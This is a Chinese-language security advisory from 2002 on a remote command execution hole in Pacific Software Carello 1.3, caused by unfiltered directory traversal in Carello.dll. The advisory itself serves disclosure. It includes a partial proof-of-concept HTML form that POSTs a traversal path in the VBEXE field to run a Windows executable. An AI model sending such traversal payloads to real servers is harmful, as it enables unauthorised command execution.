Pacific Software Carello Shopping Cart Carello.DLL远程命令执行漏洞

发布时间：2002-07-15
更新时间：2002-07-15
严重程度：中
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：5192

受影响系统

Pacific Software Carello 1.3

详细描述
Carello存在一个漏洞允许远程用户在系统中执行任意命令。

问题存在于Carello.dll在接收HTTP请求过程中，由于Carello.dll库对用户提交的HTTP请求没有进行过滤，攻击者提交包含'/..'之类的请求可导致目录遍历攻击。

测试代码
form method="POST" action= "http://server/scripts/Carello/Carello.dll"
input type="hidden" name="CARELLOCODE" value="WESTPOINT"
input type="hidden" name="VBEXE" value= "c:\inetpub\..\..\..\..\..\..\winnt\notepad.exe "
input type=....etc etc

解决方案
尚无

相关信息
Matt Moore <matt@westpoint.ltd.uk>.
参考：http://online.securityfocus.com/archive/1/281363

最近严重漏洞

Pacific Software Carello Shopping Cart Carello.DLL远程命令执行漏洞